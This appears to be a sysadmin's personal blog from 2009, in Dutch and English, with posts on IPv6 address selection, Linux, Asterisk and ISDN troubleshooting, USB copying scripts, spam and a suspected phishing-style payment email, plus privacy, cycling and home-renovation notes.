# egrep -c 'sshd.*(Invalid user|not allowed)' auth.log 
2179

I played with temporary IPv6 addresses recently, the privacy extension where the right half of the address isn't always the same address derived from the ethernet mac address but a random address. I noticed when I set Linux to use the temporary address as preferred address it was listed as 'secondary':

# ip -6 addr ls
1: lo:  mtu 16436 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
22: wlan0:  mtu 1500 qlen 1000
    inet6 2001:888:1011:1:10f3:2799:3587:237e/64 scope global secondary dynamic 
       valid_lft 604544sec preferred_lft 85544sec
    inet6 2001:888:1011:1:21f:e1ff:fe45:2894/64 scope global dynamic 
       valid_lft 2591744sec preferred_lft 604544sec
    inet6 fe80::21f:e1ff:fe45:2894/64 scope link 
       valid_lft forever preferred_lft forever

I thought maybe I can use this to fix my outgoing IPv6 address selection problem. Searching for clues how to change the status of an IPv6 address using the ip command I found: IPv6 Source Address Selection on Linux which answers my question completely, and now I can 'block' the tunnel address completely for outgoing connections:

# ip -6 addr ls dev xs4allipv6
7: xs4allipv6@NONE:  mtu 1480 
    inet6 2001:888:1011::13/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 2001:888:10:11::2/64 scope global deprecated 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:1401/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::525f:c4ca/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:201/64 scope link 
       valid_lft forever preferred_lft forever

The tunnel address is 'deprecated' so it will not be used for outgoing connections but the system still responds to it so routing works. Now the wanted address is chosen when I connect to a system 'nearby' in IPv6 address terms:

tcp6       0      0 2001:888:1011::13:41041 2001:888:0:311:194::119 ESTABLISHED

Zojuist mail binnen: ik heb een nominatie voor de IPv6 awards in de categorie particulieren. De andere genomineerde in deze categorie is Jasper Wonnink van Fix6 die volgens mij minstens even veel kans maakt. Dus ik ben benieuwd.

De nominaties:

Bedrijfsleven	NetMatch, Watchmouse
Overheid & not-for-profit	Stichting DOK, Nederlandse Publieke omroep, Ministerie van Algemene zaken
Onderwijs	Hogeschool Utrecht, Universiteit van Amsterdam
Publicatie	Benjamin Margarita, Arnout Veenman, Marcel van de Kraats
Particulieren	Jasper Wonnink, Koos van den Hout
Internet Service Providers	BIT, Signet, Shock Media, Prolocation

IPv6 awards nominaties op de IPv6 taskforce website
Persaandacht:

• Nominaties van IPv6 Awards bekendgemaakt - Computable

Vanmorgen weer een compleet overbodige fietsers afstappen gezien. Wanneer komt er eens een bordje automobilisten uitstappen en duwen. Bijvoorbeeld op de A2N2 bij Eindhoven.

Power failure this morning at work.. which left us not in the dark (enough emergency lighting) but with a completely silent serverroom. When the power came back we had some hours of work to get everything up and running again. Worst problem was with a number of Xen based virtualhosts, some centos upgrade had suddenly created a network device virbr0 which uses NAT and a local dhcp pool and enslaved all xen domU network interfaces under that bridge with no access to the 'real' network because NAT was not set up so their NFS root mount failed. The details on virbr0:

virbr0    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF
          inet addr:192.168.122.1  Bcast:192.168.122.255

A bit hard to disable, but at the end ifconfig virbr0 down ; brctl delbr virbr0 helps to get rid of the weird bridge, and all domUs will start after that.

Sheldon explains the cloud.

Mijn website heeft meer bezoekers dan die van de Telegraaf via IPv6.
Kijk maar op de 6bone Webserver List. Ontdekt door Henk van de Kamer die ook de telegraaf heeft verslagen.

Na de verhuizing van HCC!net mail (met diverse mailtjes aangekondigd) blijf ik nu zien uit fetchmail:

fetchmail: Server CommonName mismatch: localhost.localdomain != pop.hccnet.nl
fetchmail: Server certificate verification error: self signed certificate

En daar is geen uitleg over in de Veel gestelde vragen over HCC!net mail. Workaround: sslproto ssl23 in de regel voor pop.hccnet.nl zodat er geen TLS gebruikt wordt (ontleend aan How can I tell fetchmail not to use TLS if the server advertises it? Why does fetchmail use SSL even though not configured? - The Fetchmail FAQ). Beter zou natuurlijk zijn als pop.hccnet.nl gewoon een echt certificaat zou hebben.
Opmerkelijk is trouwens de sterk ontbrekende optie om HCC!net support te bereiken via e-mail op de contact pagina. Ik ga geen 60 cent per minuut betalen om ze uit te leggen dat ze het stuk gemaakt hebben.

Twee van mijn favoriete onderwerpen gecombineerd:

$ host www.ligfiets.net
www.ligfiets.net has address 82.94.245.48
www.ligfiets.net has IPv6 address 2001:888:2156::3:1:1

Nu dus ook via ipv6: www.ligfiets.net.

Going old-school today: I wrote a sed script to massage grub.conf to add a windows partition on a second disk. Searching google for has this been done before yields loads of page with handholding on how to add windows by hand to a grub.conf generated by anaconda but no simple 'automated' solution. I am always in favor of letting the computer do the boring work. But a bit of thinking and testing and now sed does the job:

if [ -b /dev/sdb1 ]; then

        cp /boot/grub/grub.conf /boot/grub/grub.conf.pre

        sed -e 's/timeout=5/timeout=30/' -e '/hiddenmenu/a\
title Windows XP (Service Pack 3)\
        rootnoverify (hd1,0)\
        map (hd0) (hd1)\
        map (hd1) (hd0)\
        makeactive\
        chainloader (hd1,0)+1
' -e '/hiddenmenu/d' < /boot/grub/grub.conf.pre > /boot/grub/grub.conf
fi

Everybody knows sed -e 's/../../' but I had to look up 'insert', 'append' and 'delete'.
Update 2009-11-12: Changed insert to append because the previous version inserted windows multiple times with multiple linux kernels. Once is enough. Also moved it from the post-install instructions to the post-reboot script so linux is fully configured before windows gets booted.

Maybe related to the constructionwork at home or to problems with the DSL network to my provider but 29 October was a day of intermittant DSL problems. And indeed, the resulting line quality graph looks 'interesting'.

Something up with sshd? Suddenly I see log entries (formatted for readability) like:

Nov  7 11:14:25 greenblatt sshd[5670]: Bad protocol version identification 'yJ
\316F\306J\226{B\247pvO\030B\330\332\352\257\337:\346\272h^\221\310\215\256C-
\253K\264l\265\320)\022\342\376\221\001?5\343\324\254\304\270\264FB\244#&tX
\3413\332m\352=\327\266\216\333\baZ<\006\267\243\236\214\217@:\021\273/vx\211
\313\362' from 220.225.222.226

I dislike seeing stuff like this.

I'm playing a bit with NDPMon - IPv6 Neighbor Discovery Protocol Monitor, now at version 1.4.0. Sofar, after configuring it in the right configuration file it likes one part of the home network (the wired part). I'm looking at it both from the viewpoint of playing with IPv6 and from the viewpoint of network security: can I use this to trace users of a network. In a large network like the one at work I could imagine ndpmon doing for IPv6 what arpwatch does for IPv4. Combine that with logs from the switches for tracing ethernet addresses and I see possibilities for a big, usable and at the same time manageable and secure network.

All the talk about gopher from the article The Web may have won, but Gopher tunnels on made me try whether I can run a gopher server which is reachable via ipv6. The answer is: yes I can.

gopher://gopher.idefix.net/ reachable via both IPv4 and IPv6.

Update 2009-11-05: and I'm not the first one to think of this. gopher://✎.net/ adds the fun of a punycode url.

Bedrijven niet voorbereid op uitputting webadressen. Alleen al door de term 'webadressen' heb je door dat de auteur wat details gemist heeft, maar we houden het er op dat het IPv6 in het nieuws weet te houden. De quote die ik er even uit wil halen:

Bovendien zijn niet alle bedrijven en organisaties op de hoogte van de noodzaak over te stappen op de nieuwe IP-versie.

Bedrijven roepen zelfs actief dat ze er prima uitkomen met NAT. En het helpt ook niet als Gartner roept dat 'we' ons nog geen zorgen hoeven te maken over IPv6: Gartner: Don't sweat move to IPv6 (heeft iemand toegang tot het originele rapport?). Veel mensen die beslissingen hierover nemen zullen Gartner graag als bron geloven.

CBC Canada has a great special: Berlin Wall: 20 years after the fall. I am glad we visited Berlin this summer and saw all the historic places from up close.

Mijn werkgever, het departement informatica van de Universiteit Utrecht, biedt ook een opleiding tot leraar informatica aan. Totnogtoe hebben ze daar nog niet zo veel reclame voor gemaakt, maar daar komt nu verandering in.

Beetje verstoring in de onweers sensor thuis, er was helemaal geen onweer volgens andere bronnen. Vermoedelijk een gevolg van de sloopwerkzaamheden van maandag.

Met de verbouwing en het boven wonen zaten we ook even na te denken over televisie: het aansluitpunt moet verplaatst worden en we hebben (nog) geen coax van beneden naar boven. Digitenne zou misschien een optie zijn voor tijdelijk maar die doen niet aan abonnementen van minder dan een jaar, terwijl de planning toch echt is dat we dit jaar nog weer normaal wonen en dan weer makkelijk bij de Ziggo kabeltv kunnen waar wel BBC 1 en BBC 2 bij zitten. Dus dan maar een lange verlengkabel (ik heb gelukkig een goede kabel in huis) door het hele trappenhuis voor als we televisie willen kijken en uitleggen dat je NIET op coax kabel mag staan.

I'm happy with my B+M ixon iq light on my recumbent bicycle but some people need more light, for example when cycling through the woods in Finland: Jukan put together a 24-watt 1680 lumen led light monster.
Found via Unreasonably bright bike light apparently hunts deer - Hack a Day (although the deer that seems to be in the resized picture is some bushes in the original picture).

The construction work at home shows a lot of progress at the moment. Tuesday morning work started and now half the back face of the house is already removed. Pictures of the progress with Dutch comments.

De verbouwing is begonnen: vanmorgen ging ik weg toen er gegraven werd voor de vloer van de uitbouw en toen ik terugkwam was de vloer gestort. Ik maak foto's van de voortgang

I noticed requests for port 37/udp in our firewall to our ntp server. That is the 'daytime' protocol which is absolutely ancient in an Internet timescale. I opened the port and started the service as an experiment and started tcpdump on it. The results are interesting:

09:50:09.749723 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 2, poll 7, prec -20
09:50:09.749782 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:52:19.808243 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 3, poll 7, prec -20
09:52:19.808301 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:53:08.511939 IP xx.xxx.183.183.34505 > 131.211.84.189.37: UDP, length: 0
09:53:08.513364 IP 131.211.84.189.37 > xx.xxx.183.183.34505: UDP, length: 4

Most traffic seen by 'tcpdump port 37' is from source port 37. Which is an artifact of certain NAT devices translating privileged ports (< 1024) to other privileged ports. Certain versions ntpd seem to ignore these requests. But there are real clients using the 'daytime' protocol.

In een discussie over 'durf je nu echt AAAA records te publiceren' vroeg ik me af of er een goeie, klantvriendelijke ipv6 test is voor websites met behulp van javascript. Natuurlijk is die er: http://ipv6test.max.nl/. Die heb ik dus snel geimplementeerd op 2 websites op het werk die nog geen ipv6 verbinding hebben maar waar we dat wel snel hopen: www.cs.uu.nl en helpdesk.cs.uu.nl. Hier komen 'onze' gebruikers langs dus is het erg interresant om te weten of in deze gebruikersgroep er een aandeel is wat problemen gaat krijgen als we AAAA records publiceren.

I brought some more USB sticks to test with and tested the filler script with 4 sticks. Interesting new problem: some USB sticks are partitioned like a harddisk and some aren't, now to find what to mount. Trying to mount everything gives a lot of kernel error messages. Using vol_id was the way to find the valid filesystems. The writing speed is still at maximum when I write 4 in parallel and no USB errors happen.

Some measurable growth in IPv6 traffic at the Amsterdam Internet Exchange: they broke the 2 Gbit IPv6 traffic (after rrdtool rounding ;)) limit. Compared to the total traffic flow (764 Gbit) this is still a very small drop but there is growth in there. On to more and more applications, dns entries and traffic! Source: AMS-IX hits 2 Gbps IPv6 traffic - Fix6

One mailing list hoster, ivillage.com, is still sending me loads of the unwanted mailing list spam and making it quite hard to get rid of it. They have 49 mailing lists, the retaliating spammer signed me up to about 41 of them, and to get rid of them I have to uncheck every one of them to unsubscribe. The 'support' link on the site let me fill in a form which got an autoreply pointing me to the unsubscribe form on the site. So more attempts to get through to them that they need to verify the addresses they get via the site and to get rid of all of their mail in one go. Reporting each and every one of their mails via spamcop has not made much of a difference yet. The acceptable use policy of their provider xo.com prohibits sending mail like this:

A communication may be unsolicited if: (1) recipients' email addresses were not obtained through a personal or customer relationship between recipient and sender, (2) recipients did not affirmatively consent to receive communications from sender, or (3) recipients have opted out of receiving communications from sender when given notice of the opportunity to do so.

I never confirmed receiving their mail, so they break rule 2.

Ok, discovering 'all USB storage' is not that hard:

ALLSTICKS=`/bin/ls /dev/disk/by-path/*usb*part1 2>/dev/null`

Now for the choice whether to fill them in parallel or serially. With two sticks (the amount I have available at the moment for testing) running two rsync processes in parallel makes the whole script (discover, mount, fill with rsync, unmount) take 27 seconds, waiting for the first rsync to finish before starting the second one takes 35 seconds. Interesting will be how these numbers look when I add more USB sticks.

An interesting project at work: copying a given set of data to as big a number of USB storage devices as possible. So we buy 4 USB hubs, which got delivered today. Connecting them to the 4 different external USB ports on my laptop shows an interesting result:

 lsusb -t
Bus#  7
`-Dev#   1 Vendor 0x0000 Product 0x0000
  |-Dev#  35 Vendor 0x2001 Product 0xf103
  | `-Dev#  36 Vendor 0x0718 Product 0x0075
  |-Dev#  34 Vendor 0x2001 Product 0xf103
  |-Dev#  33 Vendor 0x2001 Product 0xf103
  `-Dev#  32 Vendor 0x2001 Product 0xf103
Bus#  6
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  5
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  44 Vendor 0x0b97 Product 0x7761
    `-Dev#  45 Vendor 0x0b97 Product 0x7772
Bus#  4
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  3
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  2
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  1
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  24 Vendor 0x413c Product 0x8140

Notice it? No? All the high-speed USB hubs (Vendor 0x2001 Product 0xf103) are behind the same root USB hub. Interesting USB congestion problems ahead probably.

My next step will be to discover all attached usb storage (probably thanking udev a lot in the process) and filling that storage with the wanted set of data.

Eneco werd wakker en stuurde antwoord! Eneco gaat kijken of het beter kan met de e-mail. En als ik naar 'mijn eneco' wil en het zelf in de browser wil intikken: http://www.eneco.nl/mijneneco of http://mijneneco.nl/. Beide geven (nu) de correcte redirect.

I just put a printout of the Google homepage under a barcode scanner and it indeed says: Google.

Nadat ik in Juni al last had van spam van idg uitgevers / Computer!Totaal krijg ik vanochtend weer e-mail van ze, dit keer op m'n hccnet adres (de hcc wil perse met je communiceren, dus ik moest mijn hccnet adres activeren om van computer!totaal af te komen toen die optie kwam). Blijkbaar hebben ze besloten bij IDG uitgevers om het ingaan van de nieuwe regels tegen spam in de telecomwet te vieren met een spamrun naar hun oude HCC adressenbestand.
Update 2009-10-06: Niet geheel onverwacht, ook Henk van de Kamer ergert zich aan dezelfde actie van IDG maar heeft de mail blijkbaar net gehad toen het nog 'minder strafbaar' was.

Suddenly I get numerous 'newsletter subscription' mails in my inbox, some declaring I subscribed and some asking me to confirm my subscription.

Samples:

Subject: You've Been Subscribed to iVillage!                                    

You have been subscribed to:

• YourTotalHealth Special Offers • Beauty & Style Top Ten • YourTotalHealth
Community Challenges 

Subject: Mind Tools Newsletter - Please Click Link to Confirm Subscription...   

Thank you for taking the first step in subscribing to the Mind Tools
Newsletter! There's just one more thing to do before your
subscription is activated,

Welcome!                                                       

Dear rty6ry,                                                                    

Welcome and thank you for subscribing to the Food
Reference weekly newsletter.   

Dear fyhfhfg,

Thank you for subscribing to UNESCO's Communication and Information Sector
newsletter.

We have registered your subscription with these details:

First Name ftgrt
Last Name  dggdf

I must have really pissed off some spammer to get some personal attention like this. GOOD. A spammer getting all worked up isn't spamming.
Too bad none of the mails tell me which IP address I 'subscribed' from, although I have a vague idea I need to search in the area of Heerlen / Kerkrade in the Netherlands.

All the subscriptions without confirmations will be reported as spam naturally.

Actual progress in windows printing: windows 2008 with office 2003 will give a warning message about trying to print an A4 document on a printer with Letter as default format. Fixed it by selecting the right papersize for the printer, no letter paper in this building. No PC LOAD LETTER on the printer display!

Wardriving results 31 August - 27 September 2009: 2491 new networks with GPS locations.

Er wordt best nagedacht over privacy in Nederland, er wordt alleen niets gedaan met dat nadenken! Twee artikelen gisteren: Zeg uw privacy maar gedag - DePers.nl. Met als afsluiter Bart Jacobs die het eens goed uitlegt:

‘We zijn’, zegt hoogleraar Bart Jacobs samenvattend, ‘databases aan het aanleggen waar de Stasi (de gevreesde veiligheidsdienst van de voormalige DDR, red.) jaloers op zou zijn. De OV-chipkaart, de paspoorten, het EPD, ga zo maar door. Die vingerafdrukkendatabase wordt een kentekenregister voor burgers. Aangelegd voor doel A, maar gebruikt voor doel B, C, D, en E. Het argument van publieke veiligheid wordt gebruikt, terwijl de individuele veiligheid er onder te lijden heeft. En waarom er zo weinig mensen tegen protesteren? Waarom onderzocht niemand de veiligheid van de cafés in Volendam, voordat ze afbrandden? Het moet eerst een keer heel erg mis gaan, vrees ik.’

Zelfs Amnesty International gaat zich nu zorgen maken over de vrijheid in Nederland, specifiek over de bewaarplicht: Staat van bewaring - Maarten Reijnders - Uit Wordt Vervolgd, oktober 2009. Het werk van Amnesty International wordt ook moeilijker door de bewaarplicht:

De bewaarplicht is een bedreiging voor de persvrijheid. Journalisten die misstanden aan de kaak stellen, kunnen vaak niet zonder goed ingevoerde bronnen die op voorwaarde van anonimiteit hun verhaal willen doen. Door de bewaarplicht zouden klokkenluiders zich wel eens twee keer kunnen bedenken voordat ze hun verhaal aan een journalist vertellen, vreest internetjournalist en privacyvoorvechter Brenno de Winter. Als internet- en telefonieaanbieders moeten bijhouden wie met wie contact heeft gehad, wordt het immers wel erg makkelijk voor de overheid om te achterhalen welke ambtenaar vertrouwelijke informatie heeft gelekt.

Europees

Blijkbaar 'denken' sommige spammers dat dat iets goeds is, gezien de subject regels van spam de laatste dagen. Voorzover je bij spammers kunt spreken van denken, natuurlijk.

Voor de casino-spammers zie ik het al langer, varianten van:

Subject: Sluit u vandaag aan bij Euro Club Casino
Als u op zoek bent naar een betrouwbare plaats om online te spelen, met een brede selectie aan spelen en Europese betrouwbaarheid, dan is Euro Club Casino de plaats voor u.

Maar eigenlijk zit de gespamde site (www.gold-royal.net) in China, geeft een redirect naar een andere site (keno-topgame.net) in de Ukraine waar een hele website gebouwd is met machine vertalingen. En dan komt geen rekening houden met mensen buiten de US wel heel dom over:

Bel gratis: 1-866-866-6945 / 1-866-546-0445 Internationaal: 1-266-481-2382

Maar nu ook de medicijnen-spammers, met nogsteeds de bar slechte machinevertalingen:

Subject: Top pillen Uit de Top Europese Apotheek
Uw online apotheek met blijvend lage prijzen belifert ze snel en gemakkkelijk. Geniet van het comfort van uw medicijnen Qualtitats comfort van hun woning in orde en 7 dagen per week de klok rond.

Zo op het eerste gezicht machinevertaald amerikaans engels. Willen amerikaanse spammers misschien toch europese medicijnen, en een europese gezondheidszorg?

Seen today: #twatch Open Hardware Networked LCD Screen - Slashdot Hardware. Quite tempting! Affordable (USD 45) and it can do cool stuff. By default it displays real-time topic trends from Twitter on an LCD. But with a bit of playing with LCDproc it can also show system statistics, RSS feeds, mail notifications, and more such as ... METARs.

Hope someone of the LCDproc development team picks this up soon: Although the page assumes there is a way to redirect a serial port to a network stream in linux this is a bit harder.

Een stukje geschiedenis: Jeroen van Inkel bij Radio Decibel! Beelden uit 1984: de laatste uitzending van Jeroen van Inkel bij Radio Decibel voor z'n overstap naar Veronica. Met een nog zeer jonge Adam Curry in beeld en andere gezichten die later nog goed terecht gekomen zijn in de Nederlandse radio en televisie.

Ook mooi om in de video te zien: jaren 80 kapsels en brillen, draaitafels voor de muziek en een echte draaischijftelefoon voor het radio bel spel. Ook is het geheel redelijk open voor een radio piraat.

The Decibel Tapes - Radio Decibel 1984

Gevonden via radio decibel video van lion keezer op clogwog.net
Update 2009-10-14: aangepast naar gewone link in plaats van embedded video omdat er (fragmenten van) niet-rechtenvrije muziek inzitten en ik geen zin heb in welles/nietes met Buma/Stemra over embedded muziek op een niet-commercievrije website.

Radio commercials for Linux: yes, it can be done, and they are now airing in Austin, Texas, United States of America. Tux Takes To The Air, with in true open source style an open source radio ad: one can use it and remix it. I like the line:

Why are you still paying for the privilege of using your computer? There's a better way: Linux.

Found via Slashdot: Forkable Linux Radio Ad Now On the Air In Texas

Blijkbaar is 'verdacht zijn van het getuige geweest kunnen zijn' al voldoende om afgeluisterd te worden door justitie: Gegevens anonieme beller tiplijn op straat.

Haar toestel werd op het moment dat ze naar de tiplijn belde afgeluisterd, omdat het Openbaar Ministerie haar zag als belangrijke getuige van de steekpartij.

Ik vraag me af waar we gegaan zijn van 'verdacht van een zwaar genoeg misdrijf' als reden om inbreuken op de privacy te plegen tot het excuus 'verdacht van getuige geweest te zijn'.

In plaats van een rode sportauto of snelle motorfiets besloot ik voor mijn recente 40e verjaardag een bijdrage te vragen voor een betere telelens. Uiteindelijk is de keus gevallen op de Canon EF 70-300mm F4-5.6IS USM. De volgende vraag is de keuze 'waar aan te schaffen'. Over elke webwinkel zijn wel positieve en negatieve reviews (tot en met halve rampscenario's) te vinden. Dus na wikken en wegen maar een goed overkomende web-winkel gekozen: Foto Konijnenberg. Bestelling net ingeklikt en bevestigd gekregen: de Canon EF 70-300mm F4-5.6IS USM 'ExtraPlus' dus met bijbehorend UV filter en zonnekap. Ik zal dit item bijhouden met de ontwikkelingen.

Dingen die in theorie nog net even beter zouden kunnen: Duidelijker maken dat je na het aanmaken van een account op de website en het bevestigen van die account nog je bestelling moet bevestigen. En een e-mail met bestellings-bevestiging zou prima aangepast kunnen worden aan de reeds gekozen betalings-methode.

2009-09-20 12:50: bestelling in elkaar geklikt, registratie e-mail.
2009-09-20 12:54: registratie bevestigd, bestelling afgemaakt en betaald via iDeal.
2009-09-20 13:02: e-mail bericht: spullen zijn op voorraad, staan gereserveerd en worden verzonden als de betaling binnen is (is dus een generieke tekst voor alle mogelijke betalingsmethoden. Dat geeft dus verwarring bij je klanten!). Bericht compleet met klantnummer en ordernummer.
2009-09-21 17:20: sms en e-mail bericht: order is verzonden, inclusief track & trace code voor de TNT Post website.
2009-09-22 09:30: ik probeer de track & trace code op de TNT post website: werkt, status 'Zending gesorteerd in sorteercentrum'.
2009-09-22 11:03: status 'Voorgemeld en gescand op rit'.
2009-09-22 13:12: status 'Chauffeur is onderweg'.
2009-09-22 17:39: status 'Geen gehoor bij 1 ste afleverpoging'. Vraag is natuurlijk of het nu vanavond nog een keer geprobeerd wordt of morgen overdag. Volgens het briefje de volgende dag.
2009-09-23 09:18: status 'Zending zit in afleverroute'. Die statusmelding heeft nog als datum 2009-09-22.
2009-09-23 11:35: status 'Chauffeur is onderweg'.
2009-09-23 21:16: een pakketje! Jawel, een lens!

The tapedrive-with-changer on the homeserver found itself in a wedged state with at the bottom of the dmesg output:

[105715.017656] ch 0:0:1:1: Attempting to queue a TARGET RESET message
[105715.017658] CDB: 0x1b 0x20 0x0 0x0 0x2 0x0
[105715.017663] ch 0:0:1:1: Command not found
[105715.017664] aic7xxx_dev_reset returns 0x2002
[105718.936191]  target0:0:1: FAST-10 SCSI 10.0 MB/s ST (100 ns, offset 15)

And still no access to the scsi tape drive. But, there is a bigger hammer nowadays named sg_reset which can fix this:

# mt -f /dev/nst0 status
/dev/nst0: Input/output error
# sg_reset -b /dev/sg0
sg_reset: starting bus reset        
sg_reset: completed bus reset
# mt -f /dev/nst0 status
SCSI 2 tape drive:
File number=0, block number=0, partition=0.
Tape block size 0 bytes. Density code 0x25 (DDS-3).
Soft error count since last status=0
General status bits on (41010000):
 BOT ONLINE IM_REP_EN

and it's back, not needing a reboot. The list of options says it all:

Usage: sg_reset  [-b] [-d] [-h] [-V] DEVICE
  where: -b       attempt a SCSI bus reset
         -d       attempt a SCSI device reset
         -h       attempt a host adapter reset
         -V       print version string then exit

   {if no switch given then check if reset underway}
To reset use '-d' first, if that is unsuccessful, then use '-b', then '-h'

Het blijft heel moeilijk, omgaan met e-mail voor bedrijven. Ik had bij Eneco aangegeven wel via iDeal te willen betalen (vanwege de acceptgirokosten, en ik weiger automatische incasso categorisch tot dat een keer veiliger gaat worden).

Vandaag zie ik een mailtje wat misschien van Eneco is:

Subject: Uw nieuwe Eneco nota staat online                                      

U ontvangt deze email omdat u heeft gekozen voor de betaalwijze online betalen. 
                                                                                
Uw nieuwe Eneco nota staat online

Geachte mevrouw, heer,

Er staat een nieuwe nota voor u klaar op Mijn Eneco. U vindt deze nota          
bovenaan in het notaoverzicht. Door op de nota te klikken, krijgt u             
uitgebreide informatie over deze nota. U kunt de nota direct betalen            
door op de iDEAL-button achter de nota te klikken.

Direct mijn nota betalen
http://public.tripolis.com/r/9VZEywtA1Zi[...]

Geen idee wat tripolis.com is, maar ik ga niet zomaar op een 3e partij link klikken voor een betaling. Mensen proberen naar een hele andere site te sturen en dan geld te laten betalen heet 'phishing'.

Ook de headers van het mailtje geven geen vertrouwen:

Received: by outbound1.tripolis.com (PowerMTA(TM) v3.5r13) id hm7fqm0j2qks for  
        <xxxxx@yyyyyyyyyyyyy>; Thu, 17 Sep 2009 09:05:09 +0200 
        (envelope-from )                          

Geen Eneco server. Geen verwijzing naar een Eneco site. De 'echte' Eneco site gebruikt https met een EV certificaat.

Met wat zoeken in de 'mijn eneco' omgeving ontdek ik wel de openstaande betalingen. Ik verwachtte dat na het inloggen gelijk een 'u heeft een betaling openstaan' melding zichtbaar zou zijn, maar ik moest even zoeken.

Direct maar een melding achtergelaten op de Eneco site:

Ik heb aangegeven Eneco via iDeal te willen betalen, maar nu ontvang ik een mailtje wat pretendeert van Eneco te zijn voor de betaling, maar de link 'Direct mijn nota betalen' wijst naar een 3e partij - tripolis.com - waar ik niets mee te maken heb en die geen https met (EV) certificaat gebruiken. Ook blijkt uit de headers dat de mail niet afkomstig is van servers van Eneco. Elke phisher kan dit soort e-mails namaken en een mooie eigen fake-betaal site bouwen.

Gelukkig kan ik - na het nodige zoeken - ook in de wel-beveiligde omgeving van mijn eneco een verwijzing naar de betaling vinden, dus ik ben in staat om de rekening te betalen zonder de verdachte link te gebruiken.

Ik vraag Eneco om zo snel mogelijk de teksten in de e-mail berichten aan te passen zodat elke schijn van misleiding vermeden wordt en klanten uit te nodigen naar de eneco website te gaan om daar binnen de beveiligde omgeving de betaal-verwijzing te kunnen vinden. Hiervoor zou het ook handig zijn als de url https://mijn.eneco.nl/ werkt, mijn eerste gok van de 'mijn eneco' website.

Anders ben ik genoodzaakt weer terug te schakelen naar betaling per acceptgiro EN bezwaar te maken tegen eventuele acceptgiro-kosten, zie http://blog.iusmentis.com/2009/08/31/kosten-bij-acceptgiro-onredelijk-bezwarend/ .

Ik ben benieuwd naar de reactie.

Update 2009-09-17: Even opgezocht: tripols.com noemt zichzelf E-mail marketing software & delivery. Een van hun 'solutions' is dat ze zich specialiseren in 'deliverability' van business e-mails ondanks spam filters. Ruikt als een spammer, dus.

Het zou veel meer helpen als Eneco gewoon zelf deze e-mail berichten zou verzenden, zonder derde partij tracking link en met een geldige en verifieerbare digitale handtekening middels PGP of S/MIME.

Update 2009-10-06: Nog geen reactie van Eneco behalve de bevestiging van mijn bericht. Ik heb maar eens een reminder gestuurd.

Update 2009-10-08: Antwoord: ze begrijpen de verwarring met het gebruik van het domein tripolis.com en gaan er binnen Eneco naarkijken of het beter kan.

The asterisk setup with bristuff-patched zap and the qozap driver failed bigtime: a call to the internal phone failed and diverted to voicemail within 2 seconds. Back to a working mISDN version. But I can't unload the mISDN drivers correctly so it took a few reboots to get things right again.

Outgoing calls without echo are nice, but I also need incoming calls to work. According to the kernel messages I should have working echo cancellation:

[  132.157748] mISDN_dsp: Audio DSP  Rev. 1.29 (debug=0x0) EchoCancellor MG2 dtmfthreshold(100)
[  132.157753] mISDN_dsp: DSP clocks every 80 samples. This equals 1 jiffies.

Time to start testing stuff on a testserver so I don't have to reboot the home server greenblatt so often.

One good effect from the change in isdn driver: telephony sounds a lot better. This is probably because zaptel automatically enables echo cancelling:

Sep 11 20:34:38 greenblatt kernel: [ 2954.439478] Zapata Telephony Interface Registered on major 196
Sep 11 20:34:38 greenblatt kernel: [ 2954.439483] Zaptel Version: 1.4.10
Sep 11 20:34:38 greenblatt kernel: [ 2954.439484] Zaptel Echo Canceller: MG2

Today I decided to put some time in trying to use a different driver for using the openvox B200P card in the ubuntu installed asterisk in home server greenblatt. mISDN has a few stability issues in this setup (ubuntu 8.04 LTS amd64, asterisk 1.4.17 from ubuntu source recompiled for misdn support) where I can't unload the driver (instant kernel warning message and module system wedged) and sometimes after a long while the internal channel got confused and rejected calls, needing a restart of Asterisk.
So I tried the other route: the qozap driver with bristuff patches which comes with ubuntu as package zaptel-source. Configuring this driver was a bit of a puzzle. Step one: don't load ztdummy because that will confuse the channel ordering. TE / NT choice is done by the module parameter ports for the module, the bitmapped value of the TE / NT configuration. In my case I created /etc/modprobe.d/zaptel with:

 
options qozap ports=2

So the second port is switched to NT mode, which matches the jumper setup. The working samples are documented at ZaptelBRI - voip-info.org.
The qozap driver sort of works on the TE side (the side facing the phone company). Diving deeper into docs from openvox showed that the openvox cards need a slightly changed qozap driver source from http://downloads.openvox.cn/pub/drivers/bristuff/patches/. It helps to find that the version of bristuffed in Ubuntu 8.04 is probably 0.4.0.
The current state is working up to a level: I can dial numbers from the internal isdn phone to the external isdn line and I can accept calls, but trying to get dialtone from asterisk results in:

    -- Extension 's' in context 'internte' from 'xxxxxxx' does not exist.  Rejecting call on channel 0/2, span 2

which looks like the problem mentioned in Re: [Asterisk-Users] zaphfc problem: overlapdial don't work after update bristuff but that change (and a complete recompile of my asterisk package) did not do the work. Browsing the source of chan_zap shows a lot of places where it can decide to switch to 's'.

Bas Dekker kan naast heel mooi fotograferen ook heel goed schrijven over fietsen. In het snelfietspad kom ik een aantal beleidsvoorstellen tegen waar ik het riant mee eens ben. Een opmerking onderaan springt er voor mij uit:

Eerst maar eens al die levensgevaarlijk verzakte tegelfietspaden een beetje oplappen met dat geld. En een degelijke cursus uitwerken die uitgelubberde wegbeheerders leert dat je met een fiets harder kunt dan 15 kilometer per uur waaruit volgt dat hoeken van negentig graden in een fietspad op zijn zachtst gezegd een beetje hufterig zijn.

Ik ben helemaal voor! Zeker in iets wat een 'doorgaand fietspad' is is de zoveelste 90-graden hoek irritant. In 80-kilometer wegen zitten ze ook niet zomaar zonder waarschuwing.

